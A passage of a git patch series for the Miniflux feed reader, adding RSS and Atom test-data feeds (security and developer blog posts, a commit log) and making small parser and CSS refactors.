+breakages. </p>
+<p>The paper is full of fancy graphs and analysis, but the <a href="https://en.wikipedia.org/wiki/TL;DR">tldr</a> is:</p>
+<blockquote>
+<p>We discover that 43 % of web pages are not strictly dependent on JavaScript
+and that more than 67 % of pages are likely to be usable as long as the visitor
+only requires the content from the main section of the page, for which the user
+most likely reached the page, while reducing the number of tracking requests by
+85 % on average.</p>
+</blockquote>
+<p>An interesting take is that the usage of javascript framework is the main
+source of breakage, since <s>a lot</s> all of them result in completely
+unusable websites when javascript is disabled. Moreover, anecdotal data seems
+to suggest that the bigger a company is, the more their website is going to
+break when javascript is disabled.</p>
+<p>And like every decent paper, it comes with the <a href="https://gitlab.inria.fr/Spirals/breaking-bad">related code and data published</a>.</p>jvoisinTue, 26 Sep 2023 17:15:00 +0200tag:dustri.org,2023-09-26:/b/paper-notes-breaking-bad-quantifying-the-addiction-of-web-elements-to-javascript.htmlpaper_notesSnuffleupagus 0.10.0 - Babar the Elephanthttps://dustri.org/b/snuffleupagus-0100-babar-the-elephant.html<p><a href="https://snuffleupagus.readthedocs.org"><img alt="snuffleupagus logo" src="https://dustri.org/b/images/sp.png"></a></p>
+<p>I just published a new release of
+<a href="https://github.com/jvoisin/snuffleupagus/releases/tag/v0.10.0">Snuffleupagus</a>,
+the hardening module for php7+ and php8+,
+version <code>0.9.0</code>, codename "Babar the Elephant",
+named the <a href="https://en.wikipedia.org/wiki/Babar_the_Elephant">eponymous character</a>.
+The main new feature is the PHP8.3 support, but there are a couple of
+quality-of-life improvements for people using Snuffleupagus with fuzzers as
+well.</p>
+<h3>Changelog</h3>
+<ul>
+<li>Compatibility with PHP8.3</li>
+<li>Add <code>sp.log_max_len</code> to limit the maximum size of the log messages</li>
+<li>Add an example configuration for Xenforo 2.2.12 </li>
+<li>Url encode functions arguments when logging them</li>
+<li>Fix a possible NULL-byte truncation when outputting parameters in the logs</li>
+<li>Make <code>readonly_exec</code> play nice on readonly filesystems </li>
+</ul>
+<p>As usual, if you want to help, we have some
+<a href="https://github.com/jvoisin/snuffleupagus/issues?q=is%3Aopen+is%3Aissue+label%3A%22good+first+issue%22">low hanging fruits</a> ♥</p>
+<p>See you in your PHP stack!</p>jvoisinWed, 20 Sep 2023 15:25:00 +0200tag:dustri.org,2023-09-20:/b/snuffleupagus-0100-babar-the-elephant.htmlphpSome notes on "Randomized slab caches for kmalloc()"https://dustri.org/b/some-notes-on-randomized-slab-caches-for-kmalloc.html<p>Ruiqi Gong and Xiu Jianfeng got their
+<a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3c6152940584290668b35fa0800026f6a1ae05fe">Randomized slab caches for kmalloc()</a>
+patch series merged upstream, and I've had enough discussions about it to
+warrant summarising them into a small blogpost.</p>
+<p>The main idea is to have multiple slab caches, and pick one at random based on
+the address of code calling <code>kmalloc()</code> and a per-boot seed, to make heap-spraying harder.
+It's a great idea, but comes with some shortcomings for now:</p>
+<ul>
+<li>Objects being allocated via wrappers around <code>kmalloc()</code>, like <code>sock_kmalloc</code>,
+ <code>f2fs_kmalloc</code>, <code>aligned_kmalloc</code>, … will end up in the same slab cache.</li>
+<li>The slabs needs to be pinned, otherwise an attacker could <a href="https://en.wikipedia.org/wiki/Heap_feng_shui">feng-shui</a> their way
+ into having the whole slab free'ed, garbage-collected, and have a slab for
+ another type allocated at the same VA. <a href="https://thejh.net/">Jann Horn</a> and <a href="https://infosec.exchange/@nspace">Matteo Rizzo</a> have a <a href="https://github.com/torvalds/linux/compare/master...thejh:linux:slub-virtual-upstream">nice
+ set of patches</a>,
+ discussed a bit in <a href="https://googleprojectzero.blogspot.com/2021/10/how-simple-linux-kernel-memory.html">this Project Zero blogpost</a>,
+ for a feature called <a href="https://github.com/torvalds/linux/commit/f3afd3a2152353be355b90f5fd4367adbf6a955e"><code>SLAB_VIRTUAL</code></a>,
+ implementing precisely this.</li>
+<li>There are 16 slabs by default, so one chance out of 16 to end up in the same
+ slab cache as the target.</li>
+<li>There are no guard pages between caches, so inter-caches overflows are
+ possible.</li>
+<li>As pointed by <a href="https://twitter.com/andreyknvl/status/1700267669336080678">andreyknvl</a>
+ and <a href="https://infosec.exchange/@minipli/111045336853055793">minipli</a>,
+ the fewer allocations hitting a given cache means less noise,
+ so it might even help with some heap feng-shui.</li>
+<li>minipli also pointed that "randomized caches still freely
+ mix kernel allocations with user controlled ones (<code>xattr</code>, <code>keyctl</code>, <code>msg_msg</code>, …).
+ So even though merging is disabled for these caches, i.e. no direct overlap
+ with <code>cred_jar</code> etc., other object types can still be targeted (<code>struct
+ pipe_buffer</code>, BPF maps, its verifier state objects,…). It’s just a matter of
+ probing which allocation index the targeted object falls into.",
+ but I considered this out of scope, since it's much more involved;
+ albeit something like Jann Horn's <a href="https://github.com/thejh/linux/blob/slub-virtual/MITIGATION_README"><code>CONFIG_KMALLOC_SPLIT_VARSIZE</code></a>
+ wouldn't significantly increase complexity.</li>
+</ul>
+<p>Also, while code addresses as a source of entropy has historically be a great
+way to provide <a href="https://lwn.net/Articles/569635/">KASLR</a> bypasses, <code>hash_64(caller ^
+random_kmalloc_seed, ilog2(RANDOM_KMALLOC_CACHES_NR + 1))</code> shouldn't trivially
+leak offsets.</p>
+<p>The segregation technique is a bit like a weaker version of grsecurity's
+<a href="https://grsecurity.net/how_autoslab_changes_the_memory_unsafety_game">AUTOSLAB</a>,
+or a weaker kernel-land version of
+<a href="https://chromium.googlesource.com/chromium/src/+/master/base/allocator/partition_allocator/PartitionAlloc.md">PartitionAlloc</a>,
+but to be fair, making use-after-free exploitation harder, and significantly
+harder once pinning lands, with only ~150 lines of code and negligible
+performance impact is amazing and should be praised. Moreover, I wouldn't be
+surprised if this was backported in <a href="https://google.github.io/security-research/kernelctf/rules.html">Google's KernelCTF</a>
+soon, so we should see if my analysis is correct.</p>jvoisinMon, 11 Sep 2023 01:45:00 +0200tag:dustri.org,2023-09-11:/b/some-notes-on-randomized-slab-caches-for-kmalloc.htmlsecurityMaking use of pygments' filters with Pelicanhttps://dustri.org/b/making-use-of-pygments-filters-with-pelican.html<p>I've been using <a href="https://github.com/getpelican/pelican">Pelican</a>
+more or less since the beginning of this blog and I'm still
+pretty happy about it. Mostly because of how <a href="https://boringtechnology.club">boring</a>
+it is, and its complete absence of fundamental changes thorough the years.</p>
+<p>Anyway, I was looking at how to reduce the size of the pages of my blog
+and looked at how code is syntactically highlighted:
+Pelican is using <a href="https://pygments.org">Pygments</a> to do this,
+and looking at its documentation, the <a href="https://pygments.org/docs/filters/#TokenMergeFilter">TokenMergeFilter</a>
+should help a bit, by merging token of the same type together,
+instead of highlighting them separately.</p>
+<p>Pelican's documentation <a href="https://docs.getpelican.com/en/stable/settings.html">says</a>
+that options can be passed to python-markdown like this:
+<code>MARKDOWN = { 'extension_configs': { 'markdown.extensions.codehilite': {'css_class': 'highlight'} } }</code>.</p>
+<p>Looking at <a href="https://python-markdown.github.io/">python-markdown</a>'s <a href="https://python-markdown.github.io/reference/#markdown">one</a>,
+one can pass various things as parameters, but it doesn't mention filters.
+<a href="https://pygments.org/docs/filters/">Pygments documentation on this topic</a> implies
+that the only way to add filters is to use the <code>add_filter</code> method on a lexer.</p>
+<p>But <a href="https://github.com/pygments/pygments/blob/master/pygments/lexer.py">looking at the code</a>
+as suggested <a href="https://github.com/Python-Markdown/markdown/issues/1322#issuecomment-1453911760">here</a>,
+filters can be passed like any other options, meaning that one only needs to
+add the following code into the <code>pelicanconf.py</code> file to used the
+<code>TokenMergeFilter</code>:</p>
+<div class="codehilite"><pre><span></span><code><span class="kn">from</span> <span class="nn">pelican</span> <span class="kn">import</span> <span class="n">TokenMergeFilter</span>
+
+<span class="n">MARKDOWN</span> <span class="o">=</span> <span class="p">{</span>
+ <span class="s1">'extension_configs'</span><span class="p">:</span> <span class="p">{</span>
+ <span class="s1">'markdown.extensions.codehilite'</span><span class="p">:</span> <span class="p">{</span>
+ <span class="s1">'filters'</span><span class="p">:</span> <span class="p">[</span><span class="n">TokenMergeFilter</span><span class="p">()]</span>
+ <span class="p">}</span>
+ <span class="p">}</span>
+<span class="p">}</span><span class="err">`</span><span class="o">.</span>
+</code></pre></div>
+
+<p>Totally worth the effort for a marginal page size reduction!</p>jvoisinFri, 01 Sep 2023 18:30:00 +0200tag:dustri.org,2023-09-01:/b/making-use-of-pygments-filters-with-pelican.htmlwebBook review: Hacks, Leaks, and Revelationshttps://dustri.org/b/book-review-hacks-leaks-and-revelations.html<p><a href="https://nostarch.com/hacks-leaks-and-revelations"><img alt="Hacks, Leaks, and Revelations cover" src="https://dustri.org/b/images/HacksLeaksReveleations.png"></a></p>
+<p>Last month, I got an email <a href="https://nostarch.com/about">from Briana Blackwell from No Starch Press</a>'s marketing department,
+telling me that <a href="https://hacksandleaks.com/">Hacks, Leaks, and Revelations: The Art of Analyzing Hacked and Leaked Data</a>
+by <a href="https://micahflee.com/">Micah Lee</a>
+was available in <em>early access</em>, and that they'd be happy to send me an ebook
+copy free of charge!</p>
+<p>From the couple of interactions I had with him, Lee is not only a great human being,
+but also technically literate. He's the director of information security
+at <a href="https://theintercept.com/staff/micah-lee/">The Intercept</a>, and the person
+behind <a href="https://onionshare.org/">OnionShare</a> and <a href="https://dangerzone.rocks/">DangerZone</a>;
+so I was thrilled to finally get my hands on his book!</p>
+<p>And what a great one it is! It's a complete course for everyone who want to learn how to properly deal with and report on large data sets like leaks:
+How to communicate with sources along with some notions of <a href="https://en.wikipedia.org/wiki/Operations_security">opsec</a>,
+some words on the ethics of dealing with this kind of data,
+how to get data leaks and how to analyse them
+properly and safely, wrangling tools like
+<a href="https://github.com/freedomofpress/dangerzone">dangerzone</a>,
+a <a href="https://en.wikipedia.org/wiki/BitTorrent">BitTorrent</a> client,
+<a href="https://signal.org">Signal</a>,
+<a href="https://torproject.org">Tor</a> via the <a href="https://www.torproject.org/download/">Tor Browser</a> and
+<a href="https://onionshare.org/">Onionshare</a>,
+some <a href="https://en.wikipedia.org/wiki/Linux">linux</a> and <a href="https://en.wikipedia.org/wiki/Shell_(computing)">shell</a> basics,
+a crash course into data analysis with <a href="https://python.org">Python</a> and <a href="https://en.wikipedia.org/wiki/SQL">SQL</a>,
+the <a href="https://occrp.org/en">OCCRP</a>'s <a href="https://docs.aleph.occrp.org/">Aleph</a>,
+…
+with hands-on exercises and reporting examples based on real leaks like
+<a href="https://en.wikipedia.org/wiki/2021_Epik_data_breach">EpikFail</a>,
+<a href="https://en.wikipedia.org/wiki/BlueLeaks">BlueLeaks</a>,
+the <a href="https://apnews.com/article/oath-keepers-leaked-membership-rolls-2ca4195ed3a10e45dd189bf98f3e5a26">Oath Keepers leak</a>,
+<a href="https://discordleaks.unicornriot.ninja/discord/">Unicorn Riot's DiscordLeaks</a>,
+<a href="https://theintercept.com/2021/09/28/covid-telehealth-hydroxychloroquine-ivermectin-hacked/">AFLDS</a>,
+he <a href="https://www.databreaches.net/heritage-foundation-wasnt-attacked-they-leaked-their-own-data/">Heritage Foundation emails</a>,
+…</p>
+<p>It's a comprehensive yet highly digestible resource that I would wholeheartedly
+recommend to anyone remotely interested by modern journalism practises. Hacked
+and dumped databases are all around the internet, waiting to be analysed, reported on,
+contextualised and exposed, and with this book, anyone could help with
+the effort of making the world a better place: sunlight is the best
+disinfectant!</p>jvoisinWed, 16 Aug 2023 16:15:00 +0200tag:dustri.org,2023-08-16:/b/book-review-hacks-leaks-and-revelations.htmlbook_reviewsmat2 0.13.4https://dustri.org/b/mat2-0134.html<p>There is a new minor version of mat2:
+<a href="https://0xacab.org/jvoisin/mat2/tags/0.13.4">0.13.4</a>. No ground breaking
+changes, only minor improvements, code modernisation and a bit of hardening:</p>
+<ul>
+<li>Add documentation about mat2 on OSX</li>
+<li>Make use of python3.7 constructs to simplify code</li>
+<li>Use moderner type annotations</li>
+<li>Harden <code>get_meta</code> in archive.py against variants of <a href="https://cve.circl.lu/cve/CVE-2022-35410">CVE-2021-35410</a></li>
+<li>Improve MSOffice document support</li>
+<li>Package the manpage on PyPI.</li>
+</ul>
+<p>Thanks to <a href="https://anelki.net/">akierig</a>, mat2 is now <a href="https://github.com/macports/macports-ports/pull/18072">available</a> in <a href="https://trac.macports.org/">macports</a>!</p>
+<p>As usual, if you know some python help is
+<a href="https://0xacab.org/jvoisin/mat2/issues?label_name%5B%5D=good+first+issue">welcome</a>.</p>jvoisinWed, 02 Aug 2023 21:30:00 +0200tag:dustri.org,2023-08-02:/b/mat2-0134.htmlmetadataA sneaky Golang bughttps://dustri.org/b/a-sneaky-golang-bug.html<p>Today at work, I needed a function in <a href="https://go.dev/">Go</a> to remove
+duplicates from a slice, and thus wrote something like this using the
+<a href="https://go.dev/doc/tutorial/generics">generic</a>-based
+<a href="https://pkg.go.dev/golang.org/x/exp/slices">slices</a> package:</p>
+<div class="codehilite"><pre><span></span><code><span class="kd">func</span><span class="w"> </span><span class="nx">removeDuplicates</span><span class="p">(</span><span class="nx">s</span><span class="w"> </span><span class="p">[]</span><span class="nx">mytype</span><span class="p">)</span><span class="w"> </span><span class="p">[]</span><span class="nx">mytype</span><span class="w"> </span><span class="p">{</span>
+<span class="w"> </span><span class="nx">slices</span><span class="p">.</span><span class="nx">SortFunc</span><span class="p">(</span><span class="nx">s</span><span class="p">,</span><span class="w"> </span><span class="nx">less</span><span class="p">)</span>
+<span class="w"> </span><span class="nx">slices</span><span class="p">.</span><span class="nx">CompactFunc</span><span class="p">(</span><span class="nx">s</span><span class="p">,</span><span class="w"> </span><span class="nx">eq</span><span class="p">)</span>
+<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nx">s</span>
+<span class="p">}</span>
+</code></pre></div>
+
+<p>Can you spot the bug? Here are the prototypes of the two functions:</p>
+<div class="codehilite"><pre><span></span><code><span class="kd">func</span><span class="w"> </span><span class="nx">SortFunc</span><span class="p">[</span><span class="nx">E</span><span class="w"> </span><span class="kt">any</span><span class="p">](</span><span class="nx">x</span><span class="w"> </span><span class="p">[]</span><span class="nx">E</span><span class="p">,</span><span class="w"> </span><span class="nx">less</span><span class="w"> </span><span class="kd">func</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span><span class="w"> </span><span class="nx">b</span><span class="w"> </span><span class="nx">E</span><span class="p">)</span><span class="w"> </span><span class="kt">bool</span><span class="p">)</span>
+<span class="kd">func</span><span class="w"> </span><span class="nx">CompactFunc</span><span class="p">[</span><span class="nx">S</span><span class="w"> </span><span class="o">~</span><span class="p">[]</span><span class="nx">E</span><span class="p">,</span><span class="w"> </span><span class="nx">E</span><span class="w"> </span><span class="kt">any</span><span class="p">](</span><span class="nx">s</span><span class="w"> </span><span class="nx">S</span><span class="p">,</span><span class="w"> </span><span class="nx">eq</span><span class="w"> </span><span class="kd">func</span><span class="p">(</span><span class="nx">E</span><span class="p">,</span><span class="w"> </span><span class="nx">E</span><span class="p">)</span><span class="w"> </span><span class="kt">bool</span><span class="p">)</span><span class="w"> </span><span class="nx">S</span>
+</code></pre></div>
+
+<p>The first has no return value, while the second does, unused in our case, hence
+the bug. It's <em>interesting</em> to note that the go compiler is perfectly happy
+with this, and doesn't issue any warning: it was <em>extraordinarily fun</em> to pinpoint.</p>
+<p>I reached out to <a href="https://airs.com/ian/">Ian Lance Taylor</a> who
+<a href="https://cs.opensource.google/go/x/exp/+/03df57b9a50843fbf23bf90375d6584bcc8ea13d">implemented</a>
+those functions in 2021 and he pointed me to <a href="https://go.dev/blog/slices-intro">Go Slices: usage and internals
+</a>. Things indeed do become obvious once
+looking at the <a href="https://github.com/golang/go/blob/master/src/runtime/slice.go">implementation of
+<code>slice</code></a>:</p>
+<div class="codehilite"><pre><span></span><code><span class="kd">type</span><span class="w"> </span><span class="nx">slice</span><span class="w"> </span><span class="kd">struct</span><span class="w"> </span><span class="p">{</span>
+<span class="w"> </span><span class="nx">array</span><span class="w"> </span><span class="nx">unsafe</span><span class="p">.</span><span class="nx">Pointer</span>
+<span class="w"> </span><span class="nx">len</span><span class="w"> </span><span class="kt">int</span>
+<span class="w"> </span><span class="nx">cap</span><span class="w"> </span><span class="kt">int</span>
+<span class="p">}</span>
+</code></pre></div>
+
+<p>Both <code>slices.SortFunc</code> and <code>slices.CompactFunc</code> are taking a slice as
+parameter, and not a pointer to a slice, meaning that any changes to <code>len</code> and
+<code>cap</code> will be local to the function.</p>
+<p>Anyway, There is a <a href="https://github.com/golang/go/issues/20803">proposal</a> to require
+return values to be explicitly used or ignored open since 2017, but it didn't
+go anywhere for now. There is also <a href="https://github.com/golang/go/issues/20148">another proposal</a>
+to make <code>go vet</code> better at highlighting error mishandling, as well as <a href="https://github.com/kisielk/errcheck">errcheck</a>,
+but those wouldn't really help in this case.</p>jvoisinWed, 02 Aug 2023 13:15:00 +0200tag:dustri.org,2023-08-02:/b/a-sneaky-golang-bug.htmldev
\ No newline at end of file
diff --git a/internal/reader/parser/testdata/small_atom.xml b/internal/reader/parser/testdata/small_atom.xml
new file mode 100644
index 00000000..3af7b03d
--- /dev/null
+++ b/internal/reader/parser/testdata/small_atom.xml
@@ -0,0 +1,396 @@
+
+
+ tag:github.com,2008:/miniflux/v2/commits/main
+
+
+ Recent Commits to v2:main
+ 2024-03-12T05:30:27Z
+
+ tag:github.com,2008:Grit::Commit/6d97f8b4582414b6ce69467656824690057d4793
+
+
+ Parse podcast categories
+
+ 2024-03-12T05:30:27Z
+
+
+ fguillot
+ https://github.com/fguillot
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>Parse podcast categories</pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/f8e50947f2885047155a8070dddab133a5c685c2
+
+
+ Move iTunes and GooglePlay XML definitions to their own packages
+
+ 2024-03-12T05:09:31Z
+
+
+ fguillot
+ https://github.com/fguillot
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>Move iTunes and GooglePlay XML definitions to their own packages</pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/9a637ce95e05459adc4712027e6a07eaabcfe657
+
+
+ Refactor RSS parser to use default namespace
+
+ 2024-03-12T04:07:13Z
+
+
+ fguillot
+ https://github.com/fguillot
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>Refactor RSS parser to use default namespace
+
+This change avoid some limitations of the Go XML parser regarding XML namespaces</pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/d3a85b049b14d4a4ddd6b813134b2abd45fe5e8d
+
+
+ jsminifier: set JavaScript version
+
+ 2024-03-12T02:02:52Z
+
+
+ fguillot
+ https://github.com/fguillot
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>jsminifier: set JavaScript version</pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/5bcb37901c60463b27e1211e0f68295f213b19e6
+
+
+ Use crypto.GenerateRandomBytes instead of doing it by hand
+
+ 2024-03-11T23:31:43Z
+
+
+ jvoisin
+ https://github.com/jvoisin
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>Use crypto.GenerateRandomBytes instead of doing it by hand
+
+This makes the code a bit shorter, and properly handle
+cryptographic error conditions.</pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/9c8a7dfffe2f4596dcbde2c923a7539914bb252f
+
+
+ Make use of HashFromBytes everywhere
+
+ 2024-03-11T22:22:22Z
+
+
+ jvoisin
+ https://github.com/jvoisin
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>Make use of HashFromBytes everywhere
+
+It feels a bit silly to have a function and to not make use of it.</pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/74e4032ffc9faad4fec602f283a32d2af8dec47e
+
+
+ Small refactor of app.js
+
+ 2024-03-11T22:18:57Z
+
+
+ jvoisin
+ https://github.com/jvoisin
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>Small refactor of app.js
+
+- replace a lot of `let` with `const`
+- inline some `querySelectorAll` calls
+- reduce the scope of some variables
+- use some ternaries where it makes sense
+- inline one-line functions</pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/fd1fee852cb35fa0f5b0ed6dc0c23b4a6ce368c3
+
+
+ Simplify DomHelper.getVisibleElements
+
+ 2024-03-11T22:03:00Z
+
+
+ jvoisin
+ https://github.com/jvoisin
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>Simplify DomHelper.getVisibleElements
+
+Use a `filter` instead of a loop with an index.</pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/c51a3270da1f6af796b7d23fa4b434ccf11818e7
+
+
+ GitHub Actions: Add basic ESLinter checks
+
+ 2024-03-11T03:57:27Z
+
+
+ fguillot
+ https://github.com/fguillot
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>GitHub Actions: Add basic ESLinter checks</pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/45fa641d26a5f68e663aa9af72e97523d8d63c1e
+
+
+ Fix JavaScript linter path in GitHub Actions
+
+ 2024-03-11T03:37:18Z
+
+
+ fguillot
+ https://github.com/fguillot
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>Fix JavaScript linter path in GitHub Actions</pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/fd8f25916b025a92b1b8349ef9d0acdb832a9e8e
+
+
+ First steps towards trusted-types support
+
+ 2024-03-11T03:14:30Z
+
+
+ jvoisin
+ https://github.com/jvoisin
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>First steps towards trusted-types support
+
+Refactor away some trival usages of `.innerHTML`. Unfortunately, there is no way to
+enabled trusted-types in report-only mode via `<meta>` tags, see
+https://github.com/w3c/webappsec-csp/issues/277</pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/826e4d654f511ea8d1d385bdc09cbed69ff6a70f
+
+
+ Replace DomHelper.findParent with .closest
+
+ 2024-03-11T03:06:54Z
+
+
+ jvoisin
+ https://github.com/jvoisin
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>Replace DomHelper.findParent with .closest
+
+See https://developer.mozilla.org/en-US/docs/Web/API/Element/closest</pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/d9d17f0d69d1dafb3bd9d81bf9fc27df3def4f4c
+
+
+ Use a `Set` instead of an array in a KeyboardHandler's member
+
+ 2024-03-11T02:41:13Z
+
+
+ jvoisin
+ https://github.com/jvoisin
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>Use a `Set` instead of an array in a KeyboardHandler's member
+
+The variable `triggers` is only used to check if in contains a particular
+value. Given that the number of keyboard shortcuts is starting to be
+significant, let's future-proof the performances and use a `Set` instead of an
+`Array` instead.</pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/eaaeb68474ff194f682e9521a848d7ab2c89348e
+
+
+ Fix conditions to publish packages in GitHub workflows
+
+ 2024-03-10T19:25:13Z
+
+
+ fguillot
+ https://github.com/fguillot
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>Fix conditions to publish packages in GitHub workflows</pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/382885f14403526adfa6c303927889c76fd5a1eb
+
+
+ Update changeLog
+
+ 2024-03-10T17:50:47Z
+
+
+ fguillot
+ https://github.com/fguillot
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>Update changeLog</pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/0f7b047b0a81253b6d146e05d561545303016b74
+
+
+ Bump github.com/go-jose/go-jose/v3 from 3.0.1 to 3.0.3
+
+ 2024-03-08T04:59:42Z
+
+
+ dependabot
+ https://github.com/dependabot
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>Bump github.com/go-jose/go-jose/v3 from 3.0.1 to 3.0.3
+
+Bumps [github.com/go-jose/go-jose/v3](https://github.com/go-jose/go-jose) from 3.0.1 to 3.0.3.
+- [Release notes](https://github.com/go-jose/go-jose/releases)
+- [Changelog](https://github.com/go-jose/go-jose/blob/v3.0.3/CHANGELOG.md)
+- [Commits](https://github.com/go-jose/go-jose/compare/v3.0.1...v3.0.3)
+
+---
+updated-dependencies:
+- dependency-name: github.com/go-jose/go-jose/v3
+ dependency-type: indirect
+...
+
+Signed-off-by: dependabot[bot] <support@github.com></pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/a074773e6c5d3b2066094cbac0502094aa364713
+
+
+ Use an io.ReadSeeker instead of an io.Reader to parse feeds
+
+ 2024-03-07T04:13:39Z
+
+
+ jvoisin
+ https://github.com/jvoisin
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>Use an io.ReadSeeker instead of an io.Reader to parse feeds
+
+This will allow to make use of func (*Reader) Seek, instead of re-recreating a
+new reader. It's a large commit for a small change, but anything to simply the
+reader/buffer/ReadAll/… mess is a step in the right direction I think, and it
+should enable more follow-up simplifications.</pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/3d0126be0b8a603401b7593250f80b0a8042b995
+
+
+ Speed the sanitizer up a bit, again
+
+ 2024-03-06T03:31:50Z
+
+
+ jvoisin
+ https://github.com/jvoisin
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>Speed the sanitizer up a bit, again
+
+- allow youtube urls to start with `www`
+- use `strings.Builder` instead of a `bytes.Buffer`
+- use a `strings.NewReader` instead of a `bytes.NewBufferString`
+- sprinkles a couple of `continue` to make the code-flow more obvious
+- inline calls to `inList`, and put their parameters in the right order
+- simplify isPixelTracker
+- simplify `isValidIframeSource`, by extracting the hostname and comparing it
+ directly, instead of using the full url and checking if it starts with
+ multiple variations of the same one (`//`, `http:`, `https://` multiplied by
+ ``/`www.`)
+- add a benchmark</pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/eda2e2f3f5c278e44e2def72caedc33667a0fb6c
+
+
+ Bump golang.org/x/oauth2 from 0.17.0 to 0.18.0
+
+ 2024-03-05T23:39:07Z
+
+
+ dependabot
+ https://github.com/dependabot
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>Bump golang.org/x/oauth2 from 0.17.0 to 0.18.0
+
+Bumps [golang.org/x/oauth2](https://github.com/golang/oauth2) from 0.17.0 to 0.18.0.
+- [Commits](https://github.com/golang/oauth2/compare/v0.17.0...v0.18.0)
+
+---
+updated-dependencies:
+- dependency-name: golang.org/x/oauth2
+ dependency-type: direct:production
+ update-type: version-update:semver-minor
+...
+
+Signed-off-by: dependabot[bot] <support@github.com></pre>
+
+
+
+ tag:github.com,2008:Grit::Commit/111e3f2106646cd29f7f74c0102f2a570c598e2e
+
+
+ Reuse a Reader instead of copying to a buffer when parsing an atom feed
+
+ 2024-03-05T01:36:10Z
+
+
+ jvoisin
+ https://github.com/jvoisin
+
+
+ <pre style='white-space:pre-wrap;width:81ex'>Reuse a Reader instead of copying to a buffer when parsing an atom feed</pre>
+
+
+
diff --git a/internal/reader/subscription/finder.go b/internal/reader/subscription/finder.go
index 74123195..b3ba290b 100644
--- a/internal/reader/subscription/finder.go
+++ b/internal/reader/subscription/finder.go
@@ -69,7 +69,7 @@ func (f *SubscriptionFinder) FindSubscriptions(websiteURL, rssBridgeURL string)
}
// Step 1) Check if the website URL is a feed.
- if feedFormat := parser.DetectFeedFormat(f.feedResponseInfo.Content); feedFormat != parser.FormatUnknown {
+ if feedFormat, _ := parser.DetectFeedFormat(f.feedResponseInfo.Content); feedFormat != parser.FormatUnknown {
f.feedDownloaded = true
return Subscriptions{NewSubscription(responseHandler.EffectiveURL(), responseHandler.EffectiveURL(), feedFormat)}, nil
}
From ee3486af6662660f2d833eda43b4b9bbf4296277 Mon Sep 17 00:00:00 2001
From: mcnesium
Date: Tue, 12 Mar 2024 14:44:12 +0100
Subject: [PATCH 03/80] align min-width with the other min-width values
---
internal/ui/static/css/common.css | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/internal/ui/static/css/common.css b/internal/ui/static/css/common.css
index c3d79f59..aa107d12 100644
--- a/internal/ui/static/css/common.css
+++ b/internal/ui/static/css/common.css
@@ -281,7 +281,7 @@ a:hover {
}
/* Hide the logo when there is not enough space to display menus when using languages more verbose than English */
-@media (min-width: 625px) and (max-width: 830px) {
+@media (min-width: 620px) and (max-width: 830px) {
.logo {
display: none;
}
From 6bc4b35e383f515526d2cd9805d67ce4c43a87f7 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Fr=C3=A9d=C3=A9ric=20Guillot?=
Date: Tue, 12 Mar 2024 20:31:08 -0700
Subject: [PATCH 04/80] Refactor RDF parser to use an adapter
Avoid tight coupling between `model.Feed` and the original XML RDF feed.
---
internal/reader/dublincore/dublincore.go | 20 +-
internal/reader/rdf/adapter.go | 115 +++++
internal/reader/rdf/parser.go | 6 +-
internal/reader/rdf/parser_test.go | 586 ++++++++++++++---------
internal/reader/rdf/rdf.go | 125 +----
5 files changed, 480 insertions(+), 372 deletions(-)
create mode 100644 internal/reader/rdf/adapter.go
diff --git a/internal/reader/dublincore/dublincore.go b/internal/reader/dublincore/dublincore.go
index fd4b4911..18c1265d 100644
--- a/internal/reader/dublincore/dublincore.go
+++ b/internal/reader/dublincore/dublincore.go
@@ -3,29 +3,13 @@
package dublincore // import "miniflux.app/v2/internal/reader/dublincore"
-import (
- "strings"
-
- "miniflux.app/v2/internal/reader/sanitizer"
-)
-
-// DublinCoreFeedElement represents Dublin Core feed XML elements.
-type DublinCoreFeedElement struct {
- DublinCoreCreator string `xml:"http://purl.org/dc/elements/1.1/ channel>creator"`
+type DublinCoreChannelElement struct {
+ DublinCoreCreator string `xml:"http://purl.org/dc/elements/1.1/ creator"`
}
-func (feed *DublinCoreFeedElement) GetSanitizedCreator() string {
- return strings.TrimSpace(sanitizer.StripTags(feed.DublinCoreCreator))
-}
-
-// DublinCoreItemElement represents Dublin Core entry XML elements.
type DublinCoreItemElement struct {
DublinCoreTitle string `xml:"http://purl.org/dc/elements/1.1/ title"`
DublinCoreDate string `xml:"http://purl.org/dc/elements/1.1/ date"`
